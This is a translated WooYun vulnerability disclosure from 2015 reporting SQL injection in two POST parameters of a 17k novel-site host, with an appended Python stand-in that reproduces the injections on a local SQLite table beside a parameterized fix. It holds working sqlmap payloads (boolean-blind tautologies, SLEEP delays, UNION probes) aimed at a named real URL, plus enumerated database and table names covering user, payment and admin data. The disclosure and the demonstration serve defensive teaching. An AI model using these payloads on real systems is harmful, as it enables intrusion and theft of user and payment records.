
Vulnerability summary (24 followers)

Defect ID: wooyun-2015-0152968

Title: SQL injection on a website operated by 17k小说网

Vendor: 17k小说网

Author: 路人甲

Submitted: 2015-11-09 12:27

Fixed: 2016-01-11 15:32

Published: 2016-01-11 15:32

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 18

Status: Confirmed by vendor

Source: http://www.wooyun.org. For questions or assistance contact [email protected]



Vulnerability details

Disclosure status:

2015-11-09: Details sent to the vendor; awaiting vendor handling
2015-11-20: Vendor confirmed; details visible to the vendor only
2015-11-30: Details disclosed to core white hats and relevant domain experts
2015-12-10: Details disclosed to regular white hats
2015-12-20: Details disclosed to intern white hats
2016-01-11: Details disclosed to the public

Brief description:

Dang li ge dang (nonsense filler)

Detailed description:

Two POST parameters are injectable; the reachable data includes user and payment-order information.
http://ssqj.qiye.ikanshu.cn:80/org!docList.xhtml (POST)
qiyeId=4&searchKey=%e8%af%b7%e8%be%93%e5%85%a5%e6%90%9c%e7%b4%a2%e5%86%85%e5%ae%b9&type=a

Proof of vulnerability (sqlmap output):

---
Parameter: searchKey (POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (Generic comment)
    Payload: qiyeId=4&searchKey=-2528' OR 6910=6910-- &type=a

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: qiyeId=4&searchKey=%e8%af%b7%e8%be%93%e5%85%a5%e6%90%9c%e7%b4%a2%e5%86%85%e5%ae%b9' AND (SELECT * FROM (SELECT(SLEEP(5)))jlmU) AND 'dAHT'='dAHT&type=a

    Type: UNION query
    Title: Generic UNION query (NULL) - 12 columns
    Payload: qiyeId=4&searchKey=%e8%af%b7%e8%be%93%e5%85%a5%e6%90%9c%e7%b4%a2%e5%86%85%e5%ae%b9' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7176767a71,0x417374516e5252617277,0x716b6b7671),NULL,NULL,NULL,NULL,NULL-- &type=a

Parameter: type (POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause
    Payload: qiyeId=4&searchKey=%e8%af%b7%e8%be%93%e5%85%a5%e6%90%9c%e7%b4%a2%e5%86%85%e5%ae%b9&type=-4978' OR 1187=1187 AND 'YbYk'='YbYk

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: qiyeId=4&searchKey=%e8%af%b7%e8%be%93%e5%85%a5%e6%90%9c%e7%b4%a2%e5%86%85%e5%ae%b9&type=a' AND (SELECT * FROM (SELECT(SLEEP(5)))svjD) AND 'IibS'='IibS

    Type: UNION query
    Title: MySQL UNION query (NULL) - 12 columns
    Payload: qiyeId=4&searchKey=%e8%af%b7%e8%be%93%e5%85%a5%e6%90%9c%e7%b4%a2%e5%86%85%e5%ae%b9&type=a' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7176767a71,0x51476f7a43645044546b,0x716b6b7671),NULL,NULL,NULL,NULL,NULL#
---
back-end DBMS: MySQL 5.0.12
current user: 'yanwp@%'
current user is DBA: False
available databases [19]:
[*] ads
[*] banquan
[*] ca_web_pay
[*] cdps
[*] client_user_center
[*] desay
[*] information_schema
[*] qiye
[*] resource_auth
[*] resource_process
[*] skymobi_1
[*] skymobi_2
[*] skymobi_3
[*] skymobi_4
[*] skymobi_5
[*] test
[*] wap_17k
[*] xinhua
[*] zentaotask
Database: client_user_center
[73 tables]
+------------------------+
| user |
| alipay_order |
| alipay_response |
| alipaylog |
| bind_repay |
| cash_coupon |
| center_alipay_order |
| center_alipay_response |
| channel |
| channel_info |
| channel_info_history |
| channel_order |
| cmcc |
| data_statistic_base |
| exchange_code |
| exchange_code_rule |
| heartbeat |
| hj_order |
| hj_response |
| huafubao_order |
| huawei_log |
| huawei_order |
| mm_order |
| mobilepayorder |
| pay360_order |
| pay360_response |
| pp_order |
| pp_response |
| rdo_order |
| rdo_response |
| rdopay_product |
| recharge_amount |
| recharge_repay |
| sky_order |
| sky_response |
| sm_imei |
| unipay_order |
| unipay_response |
| user_append |
| user_award |
| user_bk |
| user_book_note |
| user_cash_coupon |
| user_cash_coupon_log |
| user_client |
| user_daoju |
| user_dashang |
| user_fav_mark |
| user_hd |
| user_invalid_message |
| user_message |
| user_notice |
| user_pay_before |
| user_qq |
| user_third |
| user_token_history |
| user_uuid |
| user_vip |
| user_vip_gift |
| user_vip_log |
| user_weibo |
| user_yuepiao |
| user_yuepiao_log |
| useramount |
| useramount_delinfo |
| useramountlog |
| userprop |
| userscore |
| userscorelog |
| wap_channel |
| wap_manager |
| weixin_order |
| weixin_response |
+------------------------+
Database: wap_17k
[14 tables]
+--------------------+
| user |
| adminuser |
| bookcomment |
| cmsbook |
| cmscategory |
| feedback |
| paylog |
| room_msg |
| useramount |
| useramountlog |
| userbookchapterlog |
| userbookmark |
| yeepayorder |
| yeepayresponse |
+--------------------+
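Added example, not part of the original report and not 17k's code: a Python stand-in for the org!docList.xhtml search that reproduces the injection classes shown in the sqlmap output above (the searchKey and type tautologies, and the NULL-padded UNION probe with sqlmap's marker strings 0x7176767a71 = 'qvvzq' and 0x716b6b7671 = 'qkkvq') against a constructed SQLite table, next to the bound-parameter query that closes the hole, which the empty remediation section below does not spell out. The table, column names, row contents and 2-column result shape are assumptions; the real backend is MySQL with a 12-column result, and the SLEEP-based time delays are omitted because SQLite has no such function.

```python
import sqlite3

# Constructed stand-in for the docList table behind org!docList.xhtml.
# Schema, column names and rows are assumptions for illustration only;
# the real database is MySQL and its schema is not on the page.
DOCS = [
    (1, 4, "Annual report", "a"),
    (2, 4, "Purchase order 1042", "a"),
    (3, 4, "Internal memo", "b"),
    (4, 7, "Another tenant's file", "a"),
]

# sqlmap's hex markers from the page, decoded: they bracket the reflected value.
MARK_LEFT, MARK_RIGHT = "qvvzq", "qkkvq"


def _connect():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE doc (id INTEGER, qiye_id INTEGER, title TEXT, type TEXT)")
    conn.executemany("INSERT INTO doc VALUES (?, ?, ?, ?)", DOCS)
    return conn


def vulnerable_search(qiye_id, search_key, doc_type):
    """Concatenates searchKey and type straight into the SQL, the pattern the
    sqlmap findings imply. qiyeId is cast to int, matching that it was not
    reported as injectable."""
    sql = (
        "SELECT id, title FROM doc WHERE qiye_id = " + str(int(qiye_id))
        + " AND title = '" + search_key + "'"
        + " AND type = '" + doc_type + "'"
    )
    return _connect().execute(sql).fetchall()


def safe_search(qiye_id, search_key, doc_type):
    """Same query with bound parameters: attacker input can only ever be a value."""
    sql = "SELECT id, title FROM doc WHERE qiye_id = ? AND title = ? AND type = ?"
    return _connect().execute(sql, (int(qiye_id), search_key, doc_type)).fetchall()


def boolean_blind_oracle(search):
    """sqlmap's boolean-based check: a true tautology and a false one must yield
    different responses. The true payload is the one from the searchKey finding."""
    true_rows = search(4, "-2528' OR 6910=6910-- ", "a")
    false_rows = search(4, "-2528' OR 6910=6911-- ", "a")
    return len(true_rows) != len(false_rows)


def type_param_injectable(search):
    """The type parameter's tautology, closed with a quoted string rather than a
    comment. Injectable if it returns more rows than the honest lookup would."""
    rows = search(4, "Internal memo", "-4978' OR 1187=1187 AND 'YbYk'='YbYk")
    honest = [d for d in DOCS if d[1] == 4 and d[2] == "Internal memo" and d[3] == "b"]
    return len(rows) > len(honest)


def union_probe(search, column_count):
    """Generic UNION query (NULL) with a marked string in the last column, the
    way the page's 12-column payload works. True when the marker is reflected,
    i.e. the guessed column count is right and output reaches the response."""
    if column_count < 1:
        return False
    cols = ["NULL"] * column_count
    cols[-1] = "'%s' || 'AstQnRRarw' || '%s'" % (MARK_LEFT, MARK_RIGHT)
    payload = "x' UNION ALL SELECT " + ", ".join(cols) + "-- "
    try:
        rows = search(4, payload, "a")
    except sqlite3.OperationalError:  # wrong column count breaks the UNION
        return False
    return any(isinstance(col, str) and MARK_LEFT in col and MARK_RIGHT in col
               for row in rows for col in row)


if __name__ == "__main__":
    for name, fn in (("concatenated", vulnerable_search), ("parameterized", safe_search)):
        print(name, "boolean blind:", boolean_blind_oracle(fn),
              "| type param:", type_param_injectable(fn),
              "| union (2 cols):", union_probe(fn, 2))
```

The tautology in searchKey escapes the tenant filter entirely: with the concatenated query the `-- ` comment discards `AND type = '...'`, and `OR 6910=6910` makes the WHERE clause true for every row, including rows belonging to other qiyeId values, which is why a per-tenant search endpoint ended up exposing the whole `client_user_center` and `wap_17k` databases. With bound parameters the same strings match no title and the boolean, type and UNION probes all come back negative.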

Remediation:

~~~

Copyright notice: please credit 路人甲@乌云 when reposting


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 10

Confirmed at: 2015-11-20 13:20

Vendor reply:

Thank you very much for your attention to the 17K website. We wish you a pleasant day at work!

Latest status:

None

